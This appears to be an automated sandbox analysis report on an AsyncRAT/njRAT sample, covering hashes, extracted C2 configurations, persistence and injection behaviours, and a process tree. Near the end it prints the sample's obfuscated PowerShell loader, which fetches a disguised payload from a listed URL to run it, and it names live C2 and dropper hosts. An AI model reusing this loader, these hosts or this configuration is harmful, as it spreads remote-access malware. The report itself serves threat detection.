asyncrat | 4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f

Analysis

max time kernel
148s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14-08-2024 20:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
Size

819KB
MD5

d43179e5cb6353e4de7038bdc47b01ac
SHA1

2af16fcb37dd760d46c43c895e66e08eaf3ce4e7
SHA256

4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f
SHA512

e6fc5976a203dfc4ea7436721f5eb9a580c212f790e4d3acf90f4ae48525535816aa4e764ff9488408d649f7195e0465321bb063297050d88087549d33ad08fe
SSDEEP

12288:DBdlwHRn+WlYV+96qE9SR6rGiIZgUhtUJ++n0UCbMFKb7dnOu84S6Kc90Y7Y:DBkVdlYAQC6rCJhq0UQMFKb7dOu84xZq

Score

10^/10

asyncrat njrat 014agosto agosto 14 nyan cat discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Agosto 14

crepoher09.duckdns.org:4050

Mutex

Firewallghdretsydufiognbcngksjplatadsfw

Attributes

delay
15
install
false
install_file
windowsdefender
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

014agosto

telorino1581.duckdns.org:5500

Mutex

123ADSFRETFGFDkZXSkijweqsa

Attributes

delay
1
install
false
install_file
qawsedrftyujgh.exe
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

nj3100.duckdns.org:3100

Mutex

c33a6d2b674

Attributes

reg_key
c33a6d2b674
splitter
@!#&^%$

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
20	3640	powershell.exe
47	3640	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2756	powershell.exe
3640	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WinRaR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

pid	Process
2040	pdf.exe
816	WinRaR.exe
2972	WinRaRS.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\estellionato.vbs"	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2040 set thread context of 452	2040	pdf.exe	95
PID 2972 set thread context of 1136	2972	WinRaRS.exe	98
PID 3640 set thread context of 4984	3640	powershell.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinRaRS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinRaR.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	WinRaR.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
3640	powershell.exe
3640	powershell.exe
3640	powershell.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	1136	vbc.exe
Token: SeDebugPrivilege	452	vbc.exe
Token: SeDebugPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe
Token: 33	4984	AddInProcess32.exe
Token: SeIncBasePriorityPrivilege	4984	AddInProcess32.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 2040	2008	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	91
PID 2008 wrote to memory of 2040	2008	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	91
PID 2008 wrote to memory of 2040	2008	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	91
PID 2008 wrote to memory of 816	2008	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	94
PID 2008 wrote to memory of 816	2008	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	94
PID 2008 wrote to memory of 816	2008	4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe	94
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 2040 wrote to memory of 452	2040	pdf.exe	95
PID 816 wrote to memory of 2972	816	WinRaR.exe	96
PID 816 wrote to memory of 2972	816	WinRaR.exe	96
PID 816 wrote to memory of 2972	816	WinRaR.exe	96
PID 816 wrote to memory of 2860	816	WinRaR.exe	97
PID 816 wrote to memory of 2860	816	WinRaR.exe	97
PID 816 wrote to memory of 2860	816	WinRaR.exe	97
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2972 wrote to memory of 1136	2972	WinRaRS.exe	98
PID 2860 wrote to memory of 2756	2860	WScript.exe	99
PID 2860 wrote to memory of 2756	2860	WScript.exe	99
PID 2860 wrote to memory of 2756	2860	WScript.exe	99
PID 2756 wrote to memory of 3640	2756	powershell.exe	101
PID 2756 wrote to memory of 3640	2756	powershell.exe	101
PID 2756 wrote to memory of 3640	2756	powershell.exe	101
PID 3640 wrote to memory of 4528	3640	powershell.exe	111
PID 3640 wrote to memory of 4528	3640	powershell.exe	111
PID 3640 wrote to memory of 4528	3640	powershell.exe	111
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113
PID 3640 wrote to memory of 4984	3640	powershell.exe	113

C:\Users\Admin\AppData\Local\Temp\4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe
"C:\Users\Admin\AppData\Local\Temp\4d893cc9cad144508ab60d967de1af6ff37f2049c7adc73b756812444c0f151f.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008
- C:\ProgramData\pdf.exe
  "C:\ProgramData\pdf.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:452
- C:\ProgramData\WinRaR.exe
  "C:\ProgramData\WinRaR.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:816
- - C:\ProgramData\WinRaRS.exe
    "C:\ProgramData\WinRaRS.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1136
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinRar.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻VQBy⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻JwBo⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bw⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻Og⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻aQBh⦷ ⠊ ⟙ ᧳ ৻Dg⦷ ⠊ ⟙ ᧳ ৻M⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻z⦷ ⠊ ⟙ ᧳ ৻DE⦷ ⠊ ⟙ ᧳ ৻M⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻dQBz⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻YQBy⦷ ⠊ ⟙ ᧳ ৻GM⦷ ⠊ ⟙ ᧳ ৻a⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻cgBn⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻Mg⦷ ⠊ ⟙ ᧳ ৻3⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻aQB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQBz⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻dgBi⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻Xw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Mg⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Nw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻Xw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Mg⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻Nw⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻LwB2⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻cw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻c⦷ ⠊ ⟙ ᧳ ৻Bn⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Hc⦷ ⠊ ⟙ ᧳ ৻ZQBi⦷ ⠊ ⟙ ᧳ ৻EM⦷ ⠊ ⟙ ᧳ ৻b⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bgB0⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻E4⦷ ⠊ ⟙ ᧳ ৻ZQB3⦷ ⠊ ⟙ ᧳ ৻C0⦷ ⠊ ⟙ ᧳ ৻TwBi⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻ZQBj⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻BT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻E4⦷ ⠊ ⟙ ᧳ ৻ZQB0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻VwBl⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻QwBs⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻ZQBC⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻B3⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻YgBD⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻aQBl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻EQ⦷ ⠊ ⟙ ᧳ ৻bwB3⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻b⦷ ⠊ ⟙ ᧳ ৻Bv⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BE⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻Cg⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻VQBy⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻KQ⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻aQBt⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻ZwBl⦷ ⠊ ⟙ ᧳ ৻FQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻WwBT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻FQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻LgBF⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻YwBv⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻aQBu⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻XQ⦷ ⠊ ⟙ ᧳ ৻6⦷ ⠊ ⟙ ᧳ ৻Do⦷ ⠊ ⟙ ᧳ ৻VQBU⦷ ⠊ ⟙ ᧳ ৻EY⦷ ⠊ ⟙ ᧳ ৻O⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ec⦷ ⠊ ⟙ ᧳ ৻ZQB0⦷ ⠊ ⟙ ᧳ ৻FM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻By⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bgBn⦷ ⠊ ⟙ ᧳ ৻Cg⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻QgB5⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻ZQBz⦷ ⠊ ⟙ ᧳ ৻Ck⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻P⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻8⦷ ⠊ ⟙ ᧳ ৻EI⦷ ⠊ ⟙ ᧳ ৻QQBT⦷ ⠊ ⟙ ᧳ ৻EU⦷ ⠊ ⟙ ᧳ ৻Ng⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻F8⦷ ⠊ ⟙ ᧳ ৻UwBU⦷ ⠊ ⟙ ᧳ ৻EE⦷ ⠊ ⟙ ᧳ ৻UgBU⦷ ⠊ ⟙ ᧳ ৻D4⦷ ⠊ ⟙ ᧳ ৻Pg⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻P⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻8⦷ ⠊ ⟙ ᧳ ৻EI⦷ ⠊ ⟙ ᧳ ৻QQBT⦷ ⠊ ⟙ ᧳ ৻EU⦷ ⠊ ⟙ ᧳ ৻Ng⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻F8⦷ ⠊ ⟙ ᧳ ৻RQBO⦷ ⠊ ⟙ ᧳ ৻EQ⦷ ⠊ ⟙ ᧳ ৻Pg⦷ ⠊ ⟙ ᧳ ৻+⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻V⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻BP⦷ ⠊ ⟙ ᧳ ৻GY⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻Ck⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻ZQBU⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻E8⦷ ⠊ ⟙ ᧳ ৻Zg⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻RgBs⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻Zw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bz⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ 